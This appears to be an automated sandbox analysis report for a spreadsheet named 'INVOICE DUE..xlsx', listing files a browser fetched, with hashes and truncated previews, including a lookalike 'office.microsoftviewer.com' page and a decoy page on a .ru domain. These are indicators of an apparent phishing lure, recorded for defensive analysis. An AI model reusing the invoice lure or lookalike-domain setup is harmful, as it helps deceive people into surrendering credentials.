          Preview:L..................F.@.. ...$+.,....U&.r+...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y.[....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y,[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Y,[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Y,[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Y.[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3389), with CRLF, LF line terminators
          Category:downloaded
          Size (bytes):6662
          Entropy (8bit):5.596760308546736
          Encrypted:false
          SSDEEP:
          MD5:2B68706B1DC7C4EDAF297491BE95854A
          SHA1:2126D423C94AB3DBC503FCF6C82122202B29F92A
          SHA-256:72B260A6A5C7EE14D7C600BB80F55E9CADB25F10847E383653DB23888B05EAB1
          SHA-512:2035FE2DE7E83E433E4443E146C8F87F709D8E23800894576B67432B0E97697007A2B008285A0F18C17203C0C9E823ABB19E3ED6F7F5243B47C06DB8361F1ACB
          Malicious:false
          Reputation:unknown
          URL:https://office.microsoftviewer.com/
          Preview:<html>.. <head>.. <meta . name="viewport". .content="width=device-width,.initial-scale=1.0">... .<meta.. name="robots" content="noindex, nofollow">.... . <script. src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"> .</script>.... <script.src="https://challenges.cloudflare.com/turnstile/v0/api.js">.</script>..... <style>...body ,. html .{ height:. .100%;margin: 0;display: flex;align-items:.center;justify-content:.center }..@keyframes...bounce.{.0% , 100% . ,...12.5% ., .32.5% , .76.1% { transform:. translateY(0).} 22.5% . ,. .86% {.. transform:. .translateY(7px) .}.}. #ibis { height: .179px;width:. 130px;overflow: .hidden;margin-top: -59px;margin-left:..25px..} .@keyframes. .shadow-fade { 0% ,.. 100%.,. 21.2%...,.80% ..{ opacity:.0 }.47% ,. 70% . { opacity: 1..} }..#pacifier {..width: .130px;margin-top: ..179px...} #dairywoman..{ .width: 130px;height:. 71px;border-radius: .0. 0 7px. .7px;overflow:. .hidden;margin-top: -41px
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (47261)
          Category:downloaded
          Size (bytes):47262
          Entropy (8bit):5.3974731018213795
          Encrypted:false
          SSDEEP:
          MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
          SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
          SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
          SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
          Malicious:false
          Reputation:unknown
          URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit
          Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (47992), with no line terminators
          Category:dropped
          Size (bytes):47992
          Entropy (8bit):5.605846858683577
          Encrypted:false
          SSDEEP:
          MD5:CF3402D7483B127DED4069D651EA4A22
          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
          Malicious:false
          Reputation:unknown
          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 38 x 73, 8-bit/color RGB, non-interlaced
          Category:downloaded
          Size (bytes):61
          Entropy (8bit):4.014960565232003
          Encrypted:false
          SSDEEP:
          MD5:AEB617E8AA473E3F6C1A33548B8EB010
          SHA1:36043DFA6C317CACEFD7C26D93F9530113D4B43D
          SHA-256:A9540DCA831EEB6607DA243BF8ACA35C6D26A6518DAE76538786AD6A43C85C4B
          SHA-512:0AAE63281BAFC5DD97FD673AE04045D2BA4689324448FD502BE954F3F946070213309F8429ACB3EE032B93A7A6F4563B6D0D7FB43FC7AA5DBEEBD1FE4C2F37C3
          Malicious:false
          Reputation:unknown
          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cb3da40491942b5/1727695530655/dQu8Vmt6-PI5JA5
          Preview:.PNG........IHDR...&...I........v....IDAT.....$.....IEND.B`.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text
          Category:downloaded
          Size (bytes):288
          Entropy (8bit):5.225530276865154
          Encrypted:false
          SSDEEP:
          MD5:F1569878B41D820467B0A11BAF8360E9
          SHA1:8F1B9BB5D151F0D0E92B16930698C0BBA6ADC683
          SHA-256:FC06DE01834085CB17CA56B6F3A8A081422BB702652DA0ADB81DD120A1B2211F
          SHA-512:532E9A9EF54A861ABF74AAA12C591AEDF2716CC7D9D7852B3A19F4636EA5528123434B97F9413AD1C39C06321E36BF2EDD30B52FBD2A74B0222B90DF8AF9B6CC
          Malicious:false
          Reputation:unknown
          URL:https://office.microsoftviewer.com/favicon.ico
          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.52 (Ubuntu) Server at office.microsoftviewer.com Port 80</address>.</body></html>.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text, with very long lines (503), with CRLF line terminators
          Category:dropped
          Size (bytes):6705
          Entropy (8bit):4.736717786773312
          Encrypted:false
          SSDEEP:
          MD5:FB5D4EA0E3D03535BCA99466AAFDF909
          SHA1:C96D15A543A89A17D540FCED721F77DE4D84D4E0
          SHA-256:D5FE6F66FAA819CBD1C58D2D5B973374CE4499E15C4E54E09FF4225DBE7B6DC1
          SHA-512:5771672190263CF481DA3C7D2BE680B804C526822018FF59B7BF7B95127ED6505557ADC35A05BA26BEB54D4326D8B33BE635311B7C7269EA64C2B284C84F3C83
          Malicious:false
          Reputation:unknown
          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Roadster Enthusiasts - pulseperpetuawe.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> ..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://pulseperpetuawe.ru/#">.. <i class="fas fa-car"></i> Roadster Enthusiasts .. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">.. <span class="navbar-toggler-i
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
          Category:downloaded
          Size (bytes):61
          Entropy (8bit):3.990210155325004
          Encrypted:false
          SSDEEP:
          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
          Malicious:false
          Reputation:unknown
          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65447)
          Category:dropped
          Size (bytes):89501
          Entropy (8bit):5.289893677458563
          Encrypted:false
          SSDEEP:
          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
          Malicious:false
          Reputation:unknown
          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
          File type:Microsoft Excel 2007+
          Entropy (8bit):7.932392107549698
          TrID:
          • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
          • ZIP compressed archive (8000/1) 18.60%
          File name:INVOICE DUE..xlsx
          File size:127'241 bytes
          MD5:cad5db59ef5e257021d913e2db1257f7
          SHA1:c9dbad90d7aaf722fa644ca72eaa850050d13389
          SHA256:2922870b19e2d33fa378389c0f4bf185c15a3ce16eaf08889c5089fd914fabb6
          SHA512:d1fa8be9b399ca5b90a6b02005f9b9e49285352717cb6f4ac5f99adf60cf04a49b9e0f0328cd7d1de37d5a228db2e87fe5d60d217f963ad25e251dee02fa3d3b
          SSDEEP:3072:B7zf3wyHCTBc7y2FS/Ww528LmyS6kSI6D83y4yTa9:twyi9MS/fxLmySpSIpDyTa9
          TLSH:17C312E55991C413CF9E00BEA2B563FA821F4272D1C0ACEE349531FC2965AFF81859DA
          File Content Preview:PK..........!.....i...........[Content_Types].xml ...(.........................................................................................................................................................................................................
          Icon Hash:35e58a8c0c8a85b9
          Document Type:OpenXML
          Number of OLE Files:1
          Has Summary Info:
          Application Name:
          Encrypted Document:False
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:False
          Flash Objects Count:0
          Contains VBA Macros:False